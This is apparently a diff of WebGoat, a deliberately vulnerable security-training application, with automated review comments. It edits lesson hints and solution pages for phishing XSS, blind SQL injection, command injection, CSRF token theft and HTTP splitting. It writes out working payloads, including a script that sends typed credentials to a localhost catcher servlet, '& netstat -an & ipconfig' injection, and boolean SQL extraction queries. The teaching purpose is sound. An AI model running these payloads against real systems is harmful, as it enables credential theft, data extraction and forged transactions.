+ "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "&lt;/form&gt;&lt;script&gt;function hack(){ "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; + document.phish.pass.value);} "
+ "&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/**
* password<script>function hack(){ alert("Had this been a real attack... Your credentials
* were just stolen.\nUser Name = " + document.forms[0].user.value + "\nPassword = " +
* document.forms[0].pass.value); XSSImage=new Image;
* were just stolen.\nUser Name = " + document.phish.user.value + "\nPassword = " +
* document.phish.pass.value); XSSImage=new Image;
* XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="
* +document.forms[0].user.value + "&password=" + document.forms[0].pass.value +
* "";}</script><form><br>
* +document.phish.user.value + "&password=" + document.phish.pass.value +
* "";}</script><form name="phish"><br>
* <br>
* <HR>
* <H3>This feature requires account login:</H2> <br>
* <br>
* Enter Username:<br>
* <input type="text" id="user" name="user"><br>
* <input type="text" name="user"><br>
* Enter Password:<br>
* <input type="password" name = "pass"><br>
* <input type="submit" name="login" value="login" onclick="hack()"></form><br>
@ -258,7 +261,7 @@ public class Phishing extends LessonAdapter
+ "Using XSS and HTML insertion, your goal is to: <UL>"
+ "<LI>Insert html to that requests credentials"
+ "<LI>Add javascript to actually collect the credentials"
+ "<LI>Post the credentials to http://localhost/WebGoat/catcher?PROPERTY=yes...</UL> "
+ "<LI>Post the credentials to http://localhost/webgoat/catcher?PROPERTY=yes...</UL> "
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
return (instructions);
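Review bot: The new hint line `<LI>doucument.phish.user.value - will access the user field` carries the misspelling `doucument` over from the line it replaces; it should read `document.phish.user.value`, as the snippet in the following hint does. The Javadoc-style comment block that mirrors the solution still uses `http://localhost/WebGoat/catcher` while every hint in these hunks switched to `/webgoat/`, so the comment no longer matches the strings it documents. The `&lt;H3&gt;...&lt;/H2` tag mismatch in the form hint is inherited, but since the commit rewrote those lines anyway it could close with `&lt;/H3&gt;`. The enclosing getHints method starts before the first hunk.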


@ -62,8 +62,9 @@ public class DeleteProfile extends DefaultLessonAction
if (isAuthenticated(s))
{
if (userId != employeeId) {
deleteEmployeeProfile(s, userId, employeeId);
}
try
{
chainedAction.handleRequest(s);
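Review bot: The guard added at `if (userId != employeeId)` refuses the delete silently — when the ids match nothing happens, and no message or log entry records that the request was dropped, so a caller cannot tell a refused delete from a successful one. If `userId` and `employeeId` are declared as `Integer` rather than `int`, `!=` compares references and equal ids held in different boxes would still reach `deleteEmployeeProfile`; their declarations and the start of the enclosing `handleRequest` are outside this hunk, so please confirm the types. A comment stating the intent would also help, e.g. `// refuse self-deletion; presumably so the logged-in account survives the lesson — confirm`, since the visible code alone does not say why only this one case is blocked.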


@ -68,6 +68,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
// This action has not yet been implemented. None of the lessons require it.
registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
// These actions are special in that they chain to other actions.
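Review bot: The new registration binds an `EditProfile` instance to `CREATEPROFILE_ACTION` while the comment directly above says the action is not implemented, so a request naming the create action will be handled by the edit-profile code; in an access-control lesson where the action name is what gets authorized, that mapping is easy to misread. If the registration exists only so the action name resolves, the comment should say so, e.g. `// CREATEPROFILE is not implemented; it is mapped to EditProfile only so the name resolves and is not exercised by any stage`. Otherwise leaving it unregistered, so an unknown action is rejected by whatever dispatches on the name (not visible here), is the safer default.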


@ -149,7 +149,8 @@ public class SQLInjection extends GoatHillsFinancial
}
else if (STAGE2.equals(stage))
{
instructions = "Stage 2: Block SQL Injection using a Parameterized Query.<br>"
instructions = "Stage 2: Block SQL Injection using a Parameterized Query.<br><br>"
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br><br>"
+ "Implement a fix to block SQL injection into the fields in question on the Login page. "
+ "Repeat stage 1. Verify that the attack is no longer effective.";
}
@ -161,7 +162,8 @@ public class SQLInjection extends GoatHillsFinancial
}
else if (STAGE4.equals(stage))
{
instructions = "Stage 4: Block SQL Injection using a Parameterized Query.<br>"
instructions = "Stage 4: Block SQL Injection using a Parameterized Query.<br><br>"
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br><br>"
+ "Implement a fix to block SQL injection into the relevant parameter. "
+ "Repeat stage 3. Verify that access to Neville's profile is properly blocked.";
}


@ -245,7 +245,7 @@ public class SessionFixation extends SequentialLessonAdapter
+ "During the last week we had a few problems with our database. "
+ "We have received many complaints regarding incorrect account details. "
+ "Please use the following link to verify your account "
+ "data:<br><br><center><a href=/WebGoat/"
+ "data:<br><br><center><a href=/webgoat/"
+ link
+ "> Goat Hills Financial</a></center><br><br>"
+ "We are sorry for the any inconvenience and thank you for your cooparation.<br><br>"
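Review bot: The lesson's email link is still built from a hard-coded context path, and this commit only flips it from `/WebGoat/` to `/webgoat/`; servlet context paths are case-sensitive, so the link breaks again on any deployment that keeps the `WebGoat` context name. Deriving the prefix from the request, e.g. `+ "data:<br><br><center><a href=" + s.getRequest().getContextPath() + "/"`, would follow the actual deployment (this assumes `WebSession` exposes the servlet request, as it appears to elsewhere in WebGoat — confirm). The same hard-coded path is changed the same way in the Phishing instructions hunk above, the WSDLScanning hint below, and the CSRFToken solution's `testFrame.src` and iframe URLs; those last two also hard-code `Screen=212&menu=900` even though the lesson text added in this same commit says those values vary between builds.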


@ -141,7 +141,7 @@ public class SqlStringInjection extends SequentialLessonAdapter
{
ElementContainer ec = new ElementContainer();
ec.addElement(WebGoatI18N.get("StringSqlInjectioNSecondStage"));
ec.addElement(WebGoatI18N.get("StringSqlInjectionSecondStage"));
if (s.getParser().getRawParameter(ACCT_NAME, "YOUR_NAME").equals("restart"))
{
getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");


@ -118,7 +118,7 @@ public class WSDLScanning extends LessonAdapter
hints.add("Try connecting to the WSDL with a browser or Web Service tool.");
hints.add("Sometimes the WSDL will define methods that are not available through a web API. "
+ "Try to find operations that are in the WSDL, but not part of this API");
hints.add("The URL for the web service is: http://localost/WebGoat/services/WSDLScanning <br>"
hints.add("The URL for the web service is: http://localhost/webgoat/services/WSDLScanning <br>"
+ "The WSDL can usually be viewed by adding a ?WSDL on the end of the request.");
hints.add("Look in the WSDL for the getCreditCard operation and insert the field in an intercepted request.");
return hints;


@ -82,7 +82,7 @@ FileTooLarge=File is too large
FileBinary=File is binary
TheFollowingError=The following error occurred while accessing the file: <
PathBasedAccessControlInstr1=The '
PathBasedAccessControlInstr2=' user has access to all the files in the lesson_plans/English directory. Try to break the access control mechanism and access a resource that is not in the listed directory. After selecting a file to view, WebGoat will report if access to the file was granted. An interesting file to try and obtain might be a file like tomcat/conf/tomcat-users.xml
PathBasedAccessControlInstr2=' user has access to all the files in the lesson_plans/English directory. Try to break the access control mechanism and access a resource that is not in the listed directory. After selecting a file to view, WebGoat will report if access to the file was granted. An interesting file to try and obtain might be a file like tomcat/conf/tomcat-users.xml. Remember that file paths will be different if using the WebGoat source.
ErrorGenerating=Error generating
ViewingFile=Viewing file:
File=File:



@ -1,9 +0,0 @@
<div align="Center">
<p><b>Lesson Plan Title:</b> How to Exploit Buffer Overflows</p>
</div>
<!-- Start Instructions -->
<p><b>Concept / Topic To Teach:</b> </p>
How to Exploit Buffer Overflows.
<p><b>General Goal(s):</b> </p>
This lesson needs a creator!
<!-- Stop Instructions -->


@ -21,6 +21,6 @@ In this way, the attacker can make the victim perform actions that they didn't i
</div>
<p><b>General Goal(s):</b> </p>
<!-- Start Instructions -->
Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.
Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.<br/><b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
<!-- Stop Instructions -->


@ -27,6 +27,7 @@ parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the sh
left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever
receives this email and happens to be authenticated at that time will have his funds transferred.
When you think the attack is successful, refresh the page and you will find the green check on
the left hand side menu.
the left hand side menu.<br/>
<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
<!-- Stop Instructions -->


@ -31,7 +31,8 @@ request to transfer funds. To successfully complete you need to obtain a valid
The page that presents the transfer funds form contains a valid request token. The URL for the
transfer funds page is the same as this lesson with an extra parameter "transferFunds=main". Load
this page, read the token and append the token in a forged request to transferFunds. When you think
the attack is successful, refresh the page and you will find the green check on the left hand side menu.
the attack is successful, refresh the page and you will find the green check on the left hand side menu.<br/>
<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
<!-- Stop Instructions -->


@ -33,17 +33,11 @@ solution for complete details.</p>
<p>
To read and edit Parameters you need a local proxy to intercept the HTTP request.
Here we use WebScarab. More information on WebScarab can be found in the "Useful Tools" Chapter.
After installing WebScarab and configuring your browser to use it as proxy on localhost we can start.<br><br>
<img src="images/introduction/HowToUse_1.jpg"><br><br>
We have to select "Intercept Request" in the tab "Intercept". If we send a HTTP request we get a new WebScarab window.<br><br>
<img src="images/introduction/HowToUse_2.jpg"><br><br>
Here we can read and edit the intercepted parameter. After "Accept changes" the request will be sent to the server.
</p>
<h2>Read And Edit Cookies</h2>
<p>
Often it is not only necessary to change the value of the parameters but to change the value of cookies.
We can use WebScarab to intercept the request and change cookies values just like parameter data as explained in the last topic.<br><br>
<img src="images/introduction/HowToUse_3.jpg"><br><br>
We get a new window on sending a HTTP request. On the screenshot you see where we can find cookies and how to edit the values of them.
WebScarab has functionality for this as well.
</p>
<!-- Stop Instructions -->


@ -30,5 +30,6 @@ Date: Fri, 30 Dec 2005 17:32:47 GMT</blockquote>
<!-- Start Instructions -->
<p>This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.</p>
<p>Enter a language for the system to search by. You will notice that the application is redirecting your request to another resource on the server. You should be able to use the CR (%0d) and LF (%0a) characters to exploit the attack. Your goal should be to force the server to send a 200 OK. If the screen changed as an effect to your attack, just go back to the homepage. After stage 2 is exploited successfully, you will find the green check in the left menu.</p>
<p>You may find the <a href="http://yehg.net/encoding/">PHP Charset Encoder</a> useful. The Encode and DecodeURIComponent buttons translate CR and LF.</p>
<!-- Stop Instructions -->


@ -0,0 +1,21 @@
<div align="Center">
<p><b>Lesson Plan Title:</b> How to Exploit "Off-by-One" Buffer Overflow Vulnerabilities</p>
</div>
<p><b>Concept / Topic To Teach:</b></p>
How to Exploit a Web Based "Off-by-One" Buffer Overflow.
<br>
<div align="Left">
<p><b>How the attack works:</b>
</p>
Despite being more rare, buffer overflow vulnerabilities on the web occur when a tier of the application has insufficient memory allocated to deal with the data submitted by the user. Typically, such a tier would be written in C or a similar language.
For the particular subset, namely, off-by-one overflows, this lesson focuses on the consequences of being able to overwrite the position for the trailing null byte.
As a result, further information is returned back to the user, due to the fact that no null byte was found.
</div>
<p><b>Lesson Goal(s):</b> </p>
<!-- Start Instructions -->
<p>Welcome to the <b>OWASP Hotel</b>! Can you find out which room a VIP guest is staying in?</p>
<!-- Stop Instructions -->
* Understand how a buffer overflow vulnerability can be triggered on a web application.<br>
* Understand what type of value lengths are likely to trigger a buffer overflow.<br>


@ -12,6 +12,15 @@ operates as an intercepting proxy, we can review and modify requests
and responses.<br><br>
<img src="images/introduction/webscarab.jpg"><br><br>
Webpage:<a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project</a>
<br>The .jar install file can be found at the <a href="http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61823">OWASP Sourceforge Page</a></p>
<p>After installing WebScarab and configuring your browser to use it as proxy on localhost we can start. If you are using localhost for your Tomcat server, remember to <a href="https://www.owasp.org/index.php/WebScarab_Getting_Started">put a "." after the hostname when browsing to WebGoat</a>.<br><br>
<img src="images/introduction/HowToUse_1.jpg"><br><br>
We have to select "Intercept Request" in the tab "Intercept". If we send a HTTP request we get a new WebScarab window.<br><br>
<img src="images/introduction/HowToUse_2.jpg"><br><br>
Here we can read and edit the intercepted parameter. After "Accept changes" the request will be sent to the server.<br><br>
WebScarab is also used to intercept the request and change cookies values just like parameter data:<br><br>
<img src="images/introduction/HowToUse_3.jpg"><br><br>
We get a new window on sending a HTTP request. On the screenshot you see where we can find cookies and how to edit their values.
</p>
<h2>Firebug:</h2>
<p>


@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Basic Authentication</title>
<link rel=File-List href="lesson_solutions/BasicAuthentication_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/BasicAuthentication_files/editdata.mso">
<!--[if !mso]>


@ -0,0 +1,46 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Blind Numeric SQL Injection</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Blind Numeric SQL Injection</p>
<p><b>Concept / Topic To Teach:</b><br/>
SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
<br><br>
Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
<br>
It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
<br>
</p>
<p><b>General Goal(s):</b><br/>
The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.<br/>
The goal is to find the value of the field pin in table pins for the row with the cc_number of 1111222233334444. The field is of type int, which is an integer.<br/>
Put the discovered pin value in the form to pass the lesson.
</p>
<b>Solution:</b><br/><br/>
In this lesson, the only output returned by the webpage is whether a given account exists or not. Therefore, we cannot simply request the pin number for this account.<br/>
We can take advantage of the query being used, however. The database query being used is:<br/>
SELECT * FROM user_data WHERE userid=<b>accountNumber</b>;<br/><br/>
If this query returns information for the account, the page will indicate the account exists. However, if the userid doesnt exist, no data is returned and the page says the account is invalid.
By using the AND function, we can add additional conditions to this query. If the additional condition is true, the result will be a valid account, if not the page will indicate the account is invalid.<br/>
For example, try entering these two commands for the account ID:<br/>
<b>101 AND 1=1</b> and <b>101 AND 1=2</b><br/><br/>
In the first statement, both conditions return true. Account 101 is found and 1=1, so the page indicates the account is valid.<br/>
In the second statement, only the first condition is true. Account 101 is found but 1 does not equal 2, so the page indicates the account is invalid.<br/><br/>
Now, we can use a more complicated command for our second true/false statement. The following statement will tell us if the pin is above or below 10000:<br/>
<b>101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );</b><br/><br/>
If our command returns false, it makes the entire statement false and returns and invalid account, which indicates the pin number is below 10000. If it is above 10000, the opposite is true.<br/><br/>
The last step is to repeatedly use this command with a different number to the right of the > operator until we can determine the pin number.<br/>
The pin number is <b>2364</b>. Enter this number to complete the lesson.
</body>
</html>


@ -0,0 +1,42 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Blind String SQL Injection</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Blind String SQL Injection</p>
<p><b>Concept / Topic To Teach:</b><br/>
SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
<br><br>
Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
<br>
It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
<br>
</p>
<p><b>General Goal(s):</b><br/>
The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.<br/>
The goal is to find the value of the field name in table pins for the row with the cc_number of 4321432143214321. The field is of type varchar, which is a string.<br/>
Put the discovered name in the form to pass the lesson. Only the discovered name should be put into the form field, paying close attention to the spelling and capitalization.<br/>
</p>
<b>Solution:</b><br/><br/>
This lesson is conceptually very similar to the previous lesson. The big difference is we are searching for a string, not a number.<br/>
We will attempt to figure out the name the same way, by injecting a boolean expression into the pre-scripted SQL query. It looks similar to the one from the previous lesson:<br/>
<b>101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' );</b><br/><br/>
We can compare characters the same way we can compare numbers. For example, N > M. However, without the SUBSTRING method, we are attempting to compare the entire string to one letter, which doesn't help us. The substring method has the following syntax:<br/>
<b>SUBSTRING(STRING,START,LENGTH)</b><br/><br/>
The expression above compares the first letter to H. It will return false and show invalid account number. Changing the boolean expression to <b>< 'L'</b> returns true, so we know the letter is between H and L. With a few more queries, we can determine the first letter is <b>J</b>. Note that capitalization matters, and it's right to assume the first letter is capitalized.<br/><br/>
To determine the second letter, we have to change the SUBSTRING parameters to compare against the second letter. We can use this command:<br/>
<b>101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), <u>2</u>, 1) < '<u>h</u>' );</b><br/><br/>
Using several more queries, we can determine the second letter is <b>i</b>. Note that we are comparing the second character to a lowercase h. Continue this process until you have the rest of the letters.
The name is <b>Jill</b>. Enter this name to complete the lesson. Capitalization matters.
</body>
</html>


@ -0,0 +1,37 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Bypass HTML Field Restrictions</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Bypass HTML Field Restrictions</p>
<p><b>Concept / Topic To Teach:</b><br/>
Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application
</p>
<p><b>General Goal(s):</b><br/>
The user should be able send the website input that it wasn't expecting.<br/>
For this exercise, your job is to break the client side validation and send the website input that it wasn't expecting, including input for the disabled field. <b>You must break all 6 validators at the same time</b>.
</p>
<b>Solution:</b><br/><br/>
To solve this lesson, we need to put invalid characters (slashes, quotes, etc.) into all six fields. Since three of the fields are toggles or dropdowns, we will need to intercept the request with Webscarab.<br/>
We still need to put invalid data in the disabled field, however. There are two ways of accomplishing this; we can enable the field using Firebug, or we can insert an additional field using Webscarab.<br/><br/>
To enable the field, open Firebug and find the form containing all of our fields. Find the text input named &quot;disabledinput&quot;. Delete the <b>disabled=&quot;&quot;</b> parameter. This causes the field on the page to be unlocked, and will also cause the disabledinput variable to appear in Webscarab.<br/>
<img src="lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg"><br/>
<font size="2"><b>Enabled input after removing the &quot;disabled&quot; parameter in Firebug.</b></font><br/><br/>
The other option is to add another variable when intercepting the request with Webscarab. When the intercept request window pops up, use the insert button to add a new variable called <b>disabledinput</b>.<br/><br/>
Either way you add the input, the next step is to invalidate all of the responses. Put any symbol or character that isn't allowed in for each variable. Make sure you put more than five characters in the field that is limited by length.<br/>
<img src="lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg"><br/>
<font size="2"><b>Correctly filled in request with all fields invalidated and the disabledinput variable added.</b></font><br/><br/>
Submit the request to complete the lesson.
<br/>
</body>
</html>



@ -690,7 +690,8 @@ a URL. The URL should point to the CSRF lesson with an extra parameter
menu by right clicking on the left hand menu and choosing copy shortcut.
Whoever receives this email and happens to be authenticated at that time will
have his funds transferred. When you think the attack is successful, refresh
the page and you will find the green check on the left hand side menu.<o:p></o:p></span></p>
the page and you will find the green check on the left hand side menu.<br/>
<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>


@ -68,11 +68,11 @@ filters in XPath. Following code will exactly do this:</p>
<code>
StringBuffer sb = new StringBuffer();<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/UserID | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/FirstName | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/LastName | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/SSN | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/Salary ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/UserID | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/FirstName | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/LastName | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/SSN | ");<br>
sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/Salary ");<br>
String expression = sb.toString();<br>
</code>


@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Command Injection</title>
<link rel=File-List href="lesson_solutions/CommandInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/CommandInjection_files/editdata.mso">
<!--[if !mso]>
@ -678,8 +679,8 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p><span style='font-family:"Arial","sans-serif"'>Intercept the
request with WebScarab when you click on "View". Append " &amp; netstat &minus;an
&amp; ipconfig"to the HelpFile parameter. Do not forget the double quote!<o:p></o:p></span></p>
request with WebScarab when you click on "View". Append <b>" &amp; netstat -an
&amp; ipconfig</b> to the HelpFile parameter. Do not forget the double quote!<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>


@ -16,12 +16,13 @@ multiple requests to by-pass a scriptable user-prompt
<p><b>General Goal(s):</b><br/>
Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple
malicious requests: the first to transfer funds, and the second a request to confirm the prompt
that the first request triggered. The URL should point to the CSRF lesson with an extra
that the first request triggered. The URL should point to this lesson with an extra
parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the
left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever
receives this email and happens to be authenticated at that time will have his funds transferred.
When you think the attack is successful, refresh the page and you will find the green check on
the left hand side menu
the left hand side menu<br/>
<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
</p>
<b>Solution:</b><br/>


@ -32,7 +32,8 @@ request to transfer funds. To successfully complete you need to obtain a valid
URL that presents the transfer funds form is the same as the CSRF lesson with an extra parameter
"transferFunds=main". Load this page, read the token and append the token in a forged request
to transferFunds. When you think the attack is successful, refresh the page and you will find the
green check on the left hand side menu.
green check on the left hand side menu.<br/>
<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
</p>
<b>Solution:</b><br/>
@ -70,7 +71,7 @@ var tokenvalue;
function readFrame1()
{
var frameDoc = document.getElementById("frame1").contentDocument;
var form = frameDoc.getElementsByTagName("Form")[0];
var form = frameDoc.getElementsByTagName("form")[1];
var token = form.CSRFToken.value;
tokenvalue = '&CSRFToken='+token;
@ -80,7 +81,7 @@ function readFrame1()
function loadFrame2()
{
var testFrame = document.getElementById("frame2");
testFrame.src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=4000"+tokenvalue;
testFrame.src="http://localhost:8080/webgoat/attack?Screen=212&menu=900&transferFunds=4000"+tokenvalue;
}
</pre></code>
@ -94,7 +95,7 @@ call readFrame1, which calls loadFrame2, which then sets the src for the second
<code>
<pre id="line585">&lt;<span class="start-tag">iframe</span><span class="attribute-name"> src</span>=<span class="attribute-value">"http://localhost:8080/WebGoat/attack?Screen=212&amp;menu=900&amp;transferFunds=main"
<pre id="line585">&lt;<span class="start-tag">iframe</span><span class="attribute-name"> src</span>=<span class="attribute-value">"http://localhost:8080/webgoat/attack?Screen=212&amp;menu=900&amp;transferFunds=main"
</span><span class="attribute-name">onload</span>=<span class="attribute-value">"readFrame1();"
</span><span class="attribute-name">id</span>=<span class="attribute-value">"frame1" </span><span class="attribute-name">frameborder</span>=<span class="attribute-value">"1" </span><span class="attribute-name">marginwidth</span>=<span class="attribute-value">"0"
</span><span class="attribute-name">marginheight</span>=<span class="attribute-value">"0" </span><span class="attribute-name">width</span>=<span class="attribute-value">"800" </span><span class="attribute-name">scrolling</span>=<span class="attribute-value">yes </span><span class="attribute-name">height</span>=<span class="attribute-value">"300"</span>&gt;&lt;/<span class="end-tag">iframe</span>&gt;


@ -794,7 +794,7 @@ field-end'></span><![endif]--> HTTP Response</p>
<p class=MsoNormal><o:p>&nbsp;</o:p></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Intercept the
reply and replace the body with document.forms[0].SUBMIT.disabled = false;<o:p></o:p></span></p>
reply and replace the body with document.form.SUBMIT.disabled = false;<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -804,7 +804,7 @@ reply and replace the body with document.forms[0].SUBMIT.disabled = false;<o:p><
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/DOMInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="lesson_solutions/DOMInjection_files/image008.jpg" v:shapes="Picture_x0020_52"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image008fix.jpg" v:shapes="Picture_x0020_52"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC



@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Http Basics</title>
<link rel=File-List href="lesson_solutions/HttpBasics_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HttpBasics_files/editdata.mso">
<!--[if !mso]>


@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Http Splitting and Cache Poisoning </title>
<link rel=File-List href="lesson_solutions/HttpSplitting_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HttpSplitting_files/editdata.mso">
<!--[if !mso]>
@ -979,7 +980,7 @@ attack.<o:p></o:p></span></p>
poisoning requires manipulating the Last-Modified header. This must be changed
to a date in the future.<o:p></o:p></span></p>
